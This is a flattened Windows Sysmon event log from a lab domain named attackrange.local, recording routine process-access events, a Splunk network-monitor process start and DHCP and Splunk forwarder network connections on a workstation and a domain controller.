Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082476Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082475Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082474Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082473Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082472Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082471Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082470Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082469Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082468Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082467Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3B1-615A-6E01-00000000FD01}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082466Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.148{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3B1-615A-6E01-00000000FD01}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082465Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:33.149{2FDD8D40-B3B1-615A-6E01-00000000FD01}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.279{58E9C193-ACA7-615A-1300-00000000FC01}880C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-639.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 354300x8000000000000000104581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:31.432{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49610-false10.0.1.12-8000- 10341000x8000000000000000104580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 